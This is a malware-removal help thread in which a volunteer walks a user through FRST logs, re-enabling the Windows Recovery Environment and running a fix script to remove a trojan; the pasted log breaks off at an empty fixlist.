FirewallRules: [TCP Query User{210A33E9-6B2B-44CF-BCF6-D34BC763A901}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{BC1DE14B-4640-475C-A83B-879941C715F5}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{207663F4-14AA-4B8C-8B75-0E34AECA606F}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{5F89233A-ABDC-4FF1-9263-2D96AFE62121}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{803AE086-7E6A-48E0-8802-785AA4FC4A01}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [UDP Query User{DD0732C4-EE26-4E6D-9566-D42C50E770DC}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [{92D3E127-A9C9-4A57-A4DE-C37C30EEC069}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{6D97C59F-C2D5-4B5F-A2EB-62DED9A63774}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{595BE6ED-4AE7-4E50-8492-81EF52DC503B}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{51406614-36DB-4932-854C-7354C320CCCE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{0FD1A6F0-6892-4528-8D02-6DA308CE78B8}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F5C52100-551E-41EB-9F6B-22785A10B72E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F90CFC89-D1E5-47FE-810D-4C2A003E3EC4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{B4D1EF72-3517-40C5-A216-D67E59703BD4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{95D8704A-2EE2-4ABF-A286-E107F9FE797F}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{4819C0F7-D28C-465D-9F1B-E02D925E86AE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{FC9BC8BE-3785-41F0-9673-77798F53F411}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{97D423F4-0FDF-4C9C-9062-3118615A659E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{F3617F33-975E-49A1-82F7-525FC3550128}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{A279D673-8345-423B-A713-D33AE6388178}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{2AC43D62-7AC9-47C0-9BAF-E92B1B7BBA30}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{C12F076D-5E2B-450E-91A2-3D08D18E1937}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{3D3CF842-8298-442A-B9C9-A5399B012E71}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{C31226E6-F861-4DEA-B2FD-2634BE6F0129}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{D12533D4-1609-4FAF-85BD-3A23601A19D7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C02EE326-2CB8-4B8B-85EE-B9EF5101D2FC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E6F43DE1-5773-4F5C-997C-8F9A152B8CC6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4A1A6E79-2801-44AC-93C6-A5698676BF58}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{447CC466-EC34-4DCC-9474-38A417083D49}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{B6E8D305-52B5-45E2-8C5A-2EE37A8ADB44}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{0649CB28-67B5-48B4-B97E-CDA231670A45}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{5BAD7087-DE25-4030-A16A-578CD107BD81}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{BF1E40F5-A2D7-4946-895B-E0067521547F}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [{17ED7A00-1D80-4074-B1AB-25880A7BB6B6}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [TCP Query User{396BBCA8-02CB-4338-8B42-915ECADCD922}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{73E87333-E910-4EEC-804C-17612FDD0764}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{9E3E9781-622A-4CDF-A7EF-F851961BEA19}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{7C52A72D-17FC-484E-A819-81F527082F0F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\Resolve.exe
FirewallRules: [{5B94E67F-A6E7-4C37-B249-3CED37E49F0D}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\bmdpaneld.exe
FirewallRules: [{BA3F2295-A446-4372-A933-C67E6917CAA9}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\JLCooperPanelDaemon.exe
FirewallRules: [{AF2811BE-4318-4F7F-8F60-8E10AD92B8F2}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\EuphonixPanelDaemon.exe
FirewallRules: [{9D04EBDE-0FDE-4918-94E4-D40C3C002C6F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\TangentPanelDaemon.exe
FirewallRules: [{BDA720FB-BED0-4342-84C3-1AF5017ECCAA}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\ElementsPanelDaemon.exe
FirewallRules: [{56DE631C-A030-4DF6-B707-2D24656517FF}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\DPDecoder.exe
FirewallRules: [{B0D56FFA-C1C5-488E-B442-2038AC05A5A6}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe
FirewallRules: [TCP Query User{80D1B33D-1849-4BEE-B7BB-78C9D2D3F544}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [UDP Query User{B40DADB6-9E25-4951-B741-8458BE0396EE}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [{9B19D861-CA78-446B-AD40-2E9AA11FDFB5}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{9A1FF358-15BA-4495-8972-7D4A585582FE}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{DFD16930-C6D4-42A7-8594-A07EAE59D209}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{96FED481-82D0-450B-85C3-36735EB1549F}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮攮數
FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮⹟硥e
FirewallRules: [{D61EF620-8F0B-40A6-9BB7-E836DA310B7C}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{91606396-6288-43E6-AE6F-EEB421C75181}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{807550B5-7265-4327-9B16-266D34A7742C}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{EE7BB404-A2CF-4E23-A355-EA7C2D953145}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{7C716CAC-0CA5-496D-B6B1-DBB04F82E573}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{047E31DF-A255-4F4C-9FE9-45DD54A3AB3B}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{B06B32BA-F38C-4C17-B422-99E7605B0063}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{E511541B-CD44-4376-A542-B6A6578FA8EE}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{068BAA54-B58F-43B6-8ADB-31E4DEE03ACC}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{B44756B4-DFCA-4CC9-953C-CCE8AE6CC11A}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{3C331E6B-E428-4D0C-BEA4-0FA06032B9D0}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{D450C4CE-50CA-4D6B-A47C-AF19379507B1}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{640DFB21-833E-420D-B80D-AC0DD899B614}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{6CAA584E-EA21-4F97-9554-1E5312569977}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{099E93F9-CFBA-4E6D-A852-0EFDF6E69C77}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{10B74A86-9FC5-4D84-955B-4B2C2FAADC83}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{65FA2FF6-971C-44E8-8D5E-C565539E0181}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{88078A39-6DBF-4310-9720-BC7A9811094B}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{5D12474E-76BE-4D8A-8BD7-4CECA0F32CFB}] => (Allow) C:\Users\Dan\AppData\Local\Kometa\Application\kometa.exe
FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬攮數
FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬⹟硥e
FirewallRules: [{8269955E-0B8F-464C-B326-2023E770CABC}] => (Allow) C:\Program Files (x86)\Henwood\fontenot.exe
FirewallRules: [{3606180A-FA39-4B14-88F6-E879C8BB4B0B}] => (Allow) C:\Program Files (x86)\Police\fontenot.exe
FirewallRules: [{99FAD6CC-61D4-4806-B204-7F3641DDD7F3}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [{6CCE0F5A-ED5B-48E9-898C-B3168715BED1}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [TCP Query User{9536F0CC-5E66-46E8-805B-67D9697C530F}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{C5258519-221C-4A37-A687-51526258F672}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{5507329C-601E-4572-9AD8-6C16774E1ADC}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{187A8271-92D7-449D-8643-56ECD2671F9C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C260D9CD-8DD2-4B5A-8BDE-C4CFD01C9F25}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DB1E8DAE-0016-43D8-BB69-DC8005FC9089}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{EA5A15E3-2AE2-47A4-AB76-6A52AAB47F97}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{31F2912A-119F-44BD-A9EB-53A4D506D23B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (06/04/2018 08:42:31 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:42:31Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:42:01 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:42:01Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:41:31 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:41:30Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:41:00 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:41:00Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:40:30 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:40:30Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:40:00 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:40:00Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:39:30 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:39:30Z. Error Code: 0x80070020.
 
Error: (06/04/2018 08:39:00 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-12T00:39:00Z. Error Code: 0x80070020.
 
 
System errors:
=============
Error: (06/04/2018 08:59:21 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:21 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:21 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:21 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:21 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:19 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:19 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/04/2018 08:59:19 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
 
Windows Defender:
===================================
Date: 2015-02-02 09:49:52.792
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4BF9AF7B-A43D-4E64-B277-DEFB56CDC0E3}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-02 08:06:18.260
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {16FD4F1F-550C-4A26-9400-0412629CFD5A}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 10:17:58.118
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {BADC4EF7-6BAD-444C-AB05-92085B6CF93D}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 08:23:26.263
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {C9B87AF6-96B3-4644-9422-EB0CED28391C}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-01-31 08:30:36.872
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4D8C80CB-F50C-47EE-94E8-DC02EC0EE056}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 05:57:28.954
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.844
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x8024402c
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 
 
Date: 2015-01-30 05:22:07.607
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
CodeIntegrity:
===================================
 
Date: 2018-06-04 20:47:54.128
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-04 20:18:23.888
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-03 20:21:00.442
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-02 19:44:42.276
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-01 20:24:19.030
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-05-31 20:26:36.690
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-05-30 20:23:16.216
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-05-29 20:18:30.477
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
==================== Memory info =========================== 
 
Processor: Intel® Celeron® CPU N2830 @ 2.16GHz
Percentage of memory in use: 51%
Total physical RAM: 3982.68 MB
Available physical RAM: 1942.13 MB
Total Virtual: 4686.68 MB
Available Virtual: 2737.64 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:444.65 GB) (Free:147.57 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: () (Removable) (Total:7.45 GB) (Free:3.56 GB) FAT32
 
\\?\Volume{3e80ab0f-bf50-4f22-8c02-3c22ee1a6bb4}\ (Recovery) (Fixed) (Total:0.88 GB) (Free:0.59 GB) NTFS
\\?\Volume{436d9e19-7fb5-4350-864c-86573ec335b2}\ () (Fixed) (Total:0 GB) (Free:0 GB) 
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 3F7852A4)
 
Partition: GPT.
 
========================================================
Disk: 1 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT.
 
==================== End of Addition.txt ============================


#19 RayS

RayS

  • Malware Response Team
  • 2,433 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:02:17 AM

Posted 06 June 2018 - 04:30 PM

Hi Dan,
 
Your sick laptop is infected with a nasty trojan called SmartService. We need to enter the Recovery Environment (RE) to remove the infection, but RE is currently blocked on your laptop. Please perform the procedure below on your sick laptop. It will unblock RE. In my next post, we will enter RE and run a more extensive script.

 

  • Right click on Start and select Command Prompt (Admin)
  • Copy and paste the following line next to the prompt in the command window and press Enter

bcdedit /set recoveryenabled Yes

  • As the result of running this command, you should see The operation completed successfully.

 

In your next reply...

  • Please confirm you saw The operation completed successfully when you ran the command.

 

Thank you,

 

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#20 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 07 June 2018 - 11:51 AM

Hi Ray ,

I did the command prompt on my computer and

the operation completed successful.

 

Dan



#21 RayS

RayS

  • Malware Response Team
  • 2,433 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:02:17 AM

Posted 10 June 2018 - 12:59 AM

Hi Dan,

Overview
FRST64.exe on your sick laptop is out of date and the Fixlist.txt on that machine has been corrupted. Download fresh copies of both of these files and work exclusively with these new versions, but DO NOT insert the thumb drive into your sick laptop yet. Launch Recovery Environment (RE) and open Command Prompt on your sick laptop. Only after Command Prompt is open, insert the thumb drive into the sick laptop. Navigate to FRST64.exe on your thumb drive and run the script. Send me Fixlog.txt. Scan again with FRST64.exe in normal boot and send me FRST.txt and Addition.txt.

 

Please read these instructions through to the end before you begin.


Prepare your thumb drive

  • Please download a fresh copy of Farbar Recovery Scan Tool (FRST64.exe) onto your clean PC from https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/.
  • Download the attached copy of Fixlist.txt onto your clean PC (delete or overwrite any previous version of Fixlist.txt).
  • Transfer both of these files to the root directory of your thumb drive.
  • Do not insert this thumb drive into the sick laptop yet.

 

Open Command Prompt




Now insert the thumb drive into the sick laptop.


Run the Fix script and obtain logs


  • In the Command Prompt window, type Notepad and press Enter.
  • From the notepad menu, press File > Open then navigate to your thumb drive and choose All Files.
  • Right click FRST64 and click Run as administrator.
  • Click Fix.
  • The result of running the script will appear in a file called Fixlog.txt which will be created on your thumb drive in the same location as FRST64.exe.
  • Restart your laptop into normal boot.
  • Right-click FRST64 again on your thumb drive and click Run as administrator.
  • Click Scan.
  • The result of the scan will appear in files called FRST.txt and Addition.txt which will be created on your thumb drive in the same location as FRST64.exe.
  • Insert the thumb drive into your clean PC. Then Copy and paste Fixlog.txt, FRST.txt, and Addition.txt into your reply.

 

While in normal boot, test some programs and try to connect to https://www.bleepingcomputer.com/. Don't visit any other sites because we have not reinstalled any antivirus protection yet. Also, I want to see the logs to be sure your machine is safe beyond this limited usage.

In your next reply...

  • Copy and paste the entire contents of Fixlog.txt into the body of your message.
  • Copy and post the entire contents of FRST.txt and Addition.txt into the body of your message.
  • Please tell me which programs you tried to run. Did they run successfully?
  • Were you able to connect to BleepingComputer? Which browser did you use?
  • Tell me about any unexpected symptoms you saw.

Thank you,

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#22 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 10 June 2018 - 11:37 AM

Hi Ray ,

This is Dan.

 

I'll get on it tonight and have reply tomorrow.

 

Best , 

Dan



#23 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 12 June 2018 - 09:39 AM

Hello Ray , 

This is Dan.

 

I did everything with the command prompt and scanning and fixing with

Fanbar scan and fix and did it with the stick drive like you said.

 

All programs work but that was'nt the problem , I still can't connect to the internet

the blocked yellow menue is still over the internet menue.

All the wifi signals are still running strong but still can't connect to the internet

both wi-fi and ether cable. I 'm still locked out.

 

Here are the here are the text and logs - 

 

Fixlog txt - 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01
Ran by Dan (11-06-2018 21:33:03) Run:1
Running from D:\
Loaded Profiles: Dan (Available Profiles: Dan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             